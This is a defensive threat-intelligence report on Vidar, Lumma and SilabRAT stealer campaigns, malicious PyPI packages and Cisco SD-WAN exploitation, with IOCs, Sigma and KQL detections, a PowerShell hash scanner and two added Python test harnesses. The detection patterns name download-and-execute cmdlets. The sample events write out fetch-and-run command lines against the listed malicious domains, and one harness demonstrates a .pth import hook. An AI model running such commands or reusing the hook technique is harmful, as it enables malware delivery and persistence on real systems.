Recent OTX pulses reveal a coordinated surge in credential theft operations utilizing diverse initial access vectors. Threat actors are aggressively exploiting the "AI hype cycle" (Storm-3075) and social media trends (TikTok tutorials) to distribute information stealers like Vidar and Lumma. Simultaneously, the Malware-as-a-Service (MaaS) ecosystem is evolving with the emergence of SilabRAT by actor o1oo1, which specializes in browser profile cloning and HVNC to bypass session protections.
Beyond social engineering, sophisticated supply chain attacks are targeting bioinformatics and MCP developers via malicious PyPI packages (Mini Shai-Hulud, Miasma). Infrastructure-focused actors (UAT-8616) are also actively exploiting Cisco Catalyst SD-WAN vulnerabilities to establish persistence via webshells. Collectively, these campaigns represent a full-spectrum assault on identity and session integrity, aiming to harvest credentials for financial fraud and unauthorized access.
Threat Actor / Malware Profile
Actors: Storm-3075, o1oo1, UAT-8616
Malware Families:
- Vidar Stealer: A modular infostealer often distributed via malvertising and social media. It harvests browser cookies, history, saved passwords, and cryptocurrency wallet data. Frequently uses Hijack Loader for execution.
- Lumma Stealer: A subscription-based infostealer (C2) known for aggressive evasion and targeting sensitive data (browser data, 2FA sessions). Observed in campaigns impersonating AI brands.
- SilabRAT: A MaaS offering ($5,000/mo) featuring Hidden Virtual Network Computing (HVNC) for undetectable remote control, and browser profile cloning to impersonate valid user sessions without triggering MFA.
- Supply Chain Loaders (Miasma/Hades): Malicious Python packages (`.whl`) using `.pth` hooks or `.abi3.so` extensions to execute shellcode upon import, targeting developer environments.
Attack Chain:
- Initial Access: SEO poisoning (AI lures), Social Media (TikTok tutorials), Supply Chain (PyPI), or Exploit (Cisco SD-WAN).
- Execution: PowerShell scripts (Vidar), Python import hooks (Miasma), or Webshell upload (UAT-8616).
- Persistence: Scheduled tasks, Registry run keys, or legitimate service hijacking.
- Objective: Credential dumping, session token theft, and cryptocurrency wallet extraction.
IOC Analysis
The provided pulses contain actionable indicators spanning the infrastructure and payload layers:
- Domains (C2/Download): `brokeapt.com`, `msget.run`, `d4ug.site`, `pan.rongtv.xyz`. SOC teams should block these at the DNS/proxy layer immediately. The `.run` and `.xyz` TLDs are frequently abused in these campaigns.
- IPv4: `91.199.163.124` (SilabRAT infrastructure).
- File Hashes (SHA256): Multiple payloads for Vidar, Lumma, and SilabRAT. EDR solutions should be configured to alert on execution matches.
- CVEs: CVE-2026-20128 and CVE-2026-20133 (Cisco SD-WAN). Vulnerability scanners must check for these specific CVEs.
Operational Guidance:
- Decoding: The domains `msget.run` and `d4ug.site` mimic legitimate software update repositories but host malware.
- Tooling: Use `curl` or `nslookup` to check connectivity to these domains from isolated sandboxes. Validate file hashes using VT or AlienVault OTX lookup.
Detection Engineering
```yaml
---
title: Potential Vidar/Lumma Stealer via PowerShell Social Media Lure
id: 8e2f4a91-1b2c-3d4e-5f6a-7b8c9d0e1f2a
description: Detects PowerShell commands downloading payloads from suspicious TLDs often used in TikTok or AI-themed malvertising campaigns for Vidar/Lumma stealers.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/ai-brands-as-bait/
  - https://otx.alienvault.com/pulse/fake-software-tutorials-tiktok/
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    NewProcessName|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_url:
    CommandLine|contains:
      - '.run'
      - '.xyz'
      - 'msget.run'
      - 'd4ug.site'
  condition: selection and selection_url
falsepositives:
  - Legitimate administration scripts downloading from rare TLDs
level: high
```
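To see what the rule above actually fires on, here is an added Python harness (not part of the report) that re-implements its two selections over constructed Security 4688 records and then runs a URL-aware variant that tests only the hostnames of URLs found in the command line. The event records, the `example.org`/`example.xyz` hosts and the local paths are constructed for illustration; only `msget.run` and `d4ug.site` come from the report's IOC list. The point it makes: a bare `.run`/`.xyz` substring also matches script names and output paths, which is the false positive the rule's `falsepositives` field hints at.

```python
"""Evaluate the PowerShell social-media-lure rule over sample 4688 events.

Added example, not part of the Security Arsenal report: it re-implements the
rule's two selections (download cmdlet AND suspicious-TLD substring) in Python
over constructed Security 4688 records, then shows a URL-aware variant that
only checks the host of URLs found in the command line.
"""
import re
from urllib.parse import urlparse

DOWNLOAD_MARKERS = ("Invoke-WebRequest", "IEX", "DownloadString")
SUSPICIOUS_TLDS = (".run", ".xyz")
KNOWN_BAD_HOSTS = ("msget.run", "d4ug.site")   # from the report's IOC list

# Crude URL extractor for command lines; whitespace, quotes and parentheses end a URL.
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry). Hosts other than the two
# report IOCs are placeholders under example.org / example.xyz.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": PS_EXE,
     "CommandLine": "powershell -nop -c IEX (Invoke-WebRequest 'http://msget.run/update.ps1').Content"},
    {"EventID": 4688, "NewProcessName": PS_EXE,          # '.run' inside a script name, no URL at all
     "CommandLine": r"powershell -File C:\Scripts\Invoke-Command.run.ps1 -Verb IEX"},
    {"EventID": 4688, "NewProcessName": PS_EXE,          # '.xyz' is only the output file extension
     "CommandLine": r"powershell Invoke-WebRequest https://packages.example.org/tool.zip -OutFile C:\tmp\a.xyz"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",   # not PowerShell
     "CommandLine": "cmd /c curl http://d4ug.site/x"},
    {"EventID": 4688, "NewProcessName": PS_EXE,          # genuine suspicious-TLD download
     "CommandLine": "powershell Invoke-WebRequest https://cdn.example.xyz/setup.exe -OutFile setup.exe"},
]


def _base_selection(event: dict) -> bool:
    """Shared part: EventID 4688, powershell.exe, and a download marker in the command line."""
    if event["EventID"] != 4688:
        return False
    if not event["NewProcessName"].lower().endswith("\\powershell.exe"):
        return False
    cl = event["CommandLine"].lower()
    # Sigma string modifiers are case-insensitive unless |cased is used
    return any(m.lower() in cl for m in DOWNLOAD_MARKERS)


def sigma_literal_match(event: dict) -> bool:
    """The rule as written: selection AND selection_url, both plain substring matches."""
    if not _base_selection(event):
        return False
    cl = event["CommandLine"].lower()
    return any(s in cl for s in SUSPICIOUS_TLDS + KNOWN_BAD_HOSTS)


def sigma_url_aware_match(event: dict) -> bool:
    """Tighter variant: extract URLs and test their hostnames only."""
    if not _base_selection(event):
        return False
    hosts = [(urlparse(u).hostname or "").lower() for u in URL_RE.findall(event["CommandLine"])]
    return any(h in KNOWN_BAD_HOSTS or h.endswith(SUSPICIOUS_TLDS) for h in hosts)


def run_rules(events: list) -> list:
    """Return (literal, url_aware) verdicts per event, in input order."""
    return [(sigma_literal_match(e), sigma_url_aware_match(e)) for e in events]


if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, run_rules(SAMPLE_EVENTS)):
        print(verdict, ev["CommandLine"][:70])
```

Events two and three match the literal rule but not the URL-aware variant; event five matches both because the downloaded host really sits under `.xyz`. The URL-aware logic is not expressible in plain Sigma `contains`, so in production it belongs in the SIEM query or in a post-processing step rather than in the rule file.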
```yaml
---
title: Malicious PyPI Wheel Execution via .pth Hooks
id: 3c1d2e3f-4a5b-6c7d-8e9f-0a1b2c3d4e5f
description: Detects the creation of .pth files in Python site-packages, a technique used by Miasma and Hades worms to achieve persistence via import hooks.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/mini-shai-hulud-miasma/
tags:
  - attack.persistence
  - attack.t1547.001
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 11
    TargetFilename|contains: '\Lib\site-packages\'
    TargetFilename|endswith: '.pth'
  condition: selection
falsepositives:
  - Legitimate Python package installations (verify package reputation)
level: medium
```
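The Sysmon rule above fires on every `.pth` file creation, including the benign path-only files that setuptools and editable installs write, so triage needs a way to tell the two apart. The following added Python auditor (not code from the report, nor from the Miasma/Hades packages it describes) covers both the Supply Chain Loaders entry in the malware profile and this rule. It relies on documented CPython behaviour: `site.py` reads every `*.pth` file in site-packages at interpreter start and executes any line that begins with `import`, which is the hook mechanism; everything else in a `.pth` file is just a path. It also lists native extension modules such as `.abi3.so` for review. The sample site-packages tree, its file names and the placeholder `.abi3.so` bytes are constructed for the example.

```python
"""Audit a site-packages directory for .pth import hooks and native extensions.

Added example, not code from the Security Arsenal report or from the Miasma/
Hades packages it describes. site.py reads every *.pth file in site-packages at
startup and executes lines that begin with "import " (or "import<tab>"); the
auditor flags exactly those lines. The sample tree is constructed in a
temporary directory; the .abi3.so file is placeholder bytes, not a real module.
"""
import os
import sysconfig
import tempfile


def audit_pth_files(site_packages: str) -> dict:
    """Map each .pth file name to the line numbers that CPython would execute."""
    result = {}
    for name in sorted(os.listdir(site_packages)):
        if not name.endswith(".pth"):
            continue
        exec_lines = []
        with open(os.path.join(site_packages, name), encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                line = line.rstrip()   # site.py rstrips, so leading whitespace is NOT executed
                # site.py treats "import ..." lines as code; everything else is a path or comment
                if line.startswith(("import ", "import\t")):
                    exec_lines.append(lineno)
        result[name] = exec_lines
    return result


def find_native_extensions(site_packages: str) -> list:
    """List native extension modules (.so/.pyd, including .abi3.so) below site-packages."""
    hits = []
    for root, _dirs, files in os.walk(site_packages):
        for fname in files:
            if fname.endswith((".so", ".pyd")):
                rel = os.path.relpath(os.path.join(root, fname), site_packages)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


def build_sample_site_packages() -> str:
    """Construct a throwaway site-packages: one benign .pth, one hook-style .pth, one .abi3.so."""
    base = tempfile.mkdtemp(prefix="sitepkg_")
    # Benign: path-only .pth, as setuptools/editable installs write them
    with open(os.path.join(base, "easy-install.pth"), "w") as fh:
        fh.write("./mypkg-1.0-py3.11.egg\n")
    # Hook style (constructed, harmless): the import line runs on every interpreter start
    with open(os.path.join(base, "zzz_hook.pth"), "w") as fh:
        fh.write("# looks like an ordinary path file\n")
        fh.write("import os; os.environ['PTH_HOOK_DEMO'] = '1'\n")
    os.makedirs(os.path.join(base, "fakepkg"))
    with open(os.path.join(base, "fakepkg", "_native.abi3.so"), "wb") as fh:
        fh.write(b"\x7fELF placeholder")   # not a loadable object
    return base


if __name__ == "__main__":
    # Run against the live environment the script is executed in
    live = sysconfig.get_paths()["purelib"]
    for pth, lines in audit_pth_files(live).items():
        print(f"{pth}: {'EXECUTES CODE at lines ' + str(lines) if lines else 'paths only'}")
    print("native extensions found:", len(find_native_extensions(live)))
```

Run it as a script to audit the interpreter's own site-packages; in incident response, point the functions at a suspect virtualenv's `site-packages` instead. A `.pth` file with executable lines that no installed package accounts for is the artifact to escalate on, and the native extension list gives the files to hash and check against the report's SHA256 IOCs.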
```yaml
---
title: Cisco SD-WAN Manager Authentication Bypass Exploit Attempt
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects exploitation attempts against Cisco Catalyst SD-WAN Manager utilizing authentication bypass vulnerabilities.
status: experimental
date: 2026/06/13
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/cisco-sd-wan-exploitation/
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  product: cisco
  service: sd-wan
detection:
  selection_uri:
    c-uri|contains:
      - '/appmgr/maintenance/'
      - '/das/query'
  selection_method:
    c-method: 'POST'
  selection_status:
    sc-status: 200
  condition: all of selection_*
falsepositives:
  - Unknown
level: critical
```
```kql
// Hunt for Vidar/Lumma C2 Domains and IP connections
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("brokeapt.com", "msget.run", "d4ug.site", "pan.rongtv.xyz")
    or RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP
| extend ThreatContext = "OTX Pulse: AI Lures / TikTok / SilabRAT"

// Hunt for file hashes associated with identified malware families
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA256 in (
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b"
)
| project Timestamp, DeviceName, FolderPath, ProcessCommandLine, SHA256
```
```powershell
# IOC Hunter: Scans for Vidar/Lumma/SilabRAT payload artifacts on disk
# Requires Administrator privileges
$TargetHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b"
)
$ReportPath = "C:\Temp\IOC_Match.csv"
# Export-Csv does not create the directory, so make sure it exists first
$null = New-Item -ItemType Directory -Path (Split-Path $ReportPath) -Force

Write-Host "[+] Starting IOC Scan for Vidar/Lumma/SilabRAT Artifacts..." -ForegroundColor Cyan

# Scan C: drive
$DrivesToScan = @("C:\")
$Hits = foreach ($Drive in $DrivesToScan) {
    Write-Host "[+] Scanning $Drive..." -ForegroundColor Yellow
    # -File skips directories; the anchored regex matches the extension exactly
    # ('.dllx' or '.exe.bak' no longer match as they did with the unanchored pattern)
    Get-ChildItem -Path $Drive -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -gt 0 -and $_.Extension -match '^\.(exe|dll|ps1|zip|rat)$' } |
        ForEach-Object {
            # Hash each candidate once instead of once in the filter and again in the projection
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Hash -and $TargetHashes -contains $Hash) {
                [PSCustomObject]@{
                    FullName      = $_.FullName
                    SHA256        = $Hash
                    LastWriteTime = $_.LastWriteTime
                }
            }
        }
}

if ($Hits) {
    $Hits | Export-Csv -Path $ReportPath -NoTypeInformation
    Write-Host "[!] Scan Complete. $($Hits.Count) match(es) written to $ReportPath" -ForegroundColor Red
} else {
    Write-Host "[+] Scan Complete. No matching files found." -ForegroundColor Green
}
```
Response Priorities
Immediate (0-24h):
- Network Blocking: Block all domains listed in IOC Analysis (`*.run`, `*.xyz`) and IP `91.199.163.124` on firewalls and proxies.
- Vulnerability Patching: Identify and patch Cisco Catalyst SD-WAN instances vulnerable to CVE-2026-20128 immediately.
- Endpoint Isolation: Isolate endpoints triggering Sigma rules for PowerShell downloads from suspicious TLDs.
24-48h:
- Credential Hygiene: Force password resets and session invalidation for users in targeted segments (Tech, Finance, Bioinformatics) if credential theft is suspected.
- Supply Chain Audit: Developers must verify Python package integrity (`pip-audit`) and remove packages matching "Mini Shai-Hulud" or "Miasma" descriptions.
1 Week+:
- Architecture Hardening: Implement strict application allowlisting to prevent execution of unauthorized PowerShell scripts and binaries.
- User Awareness: Update security awareness training to include warnings regarding "AI software" scams and TikTok/Instagram "software hack" tutorials.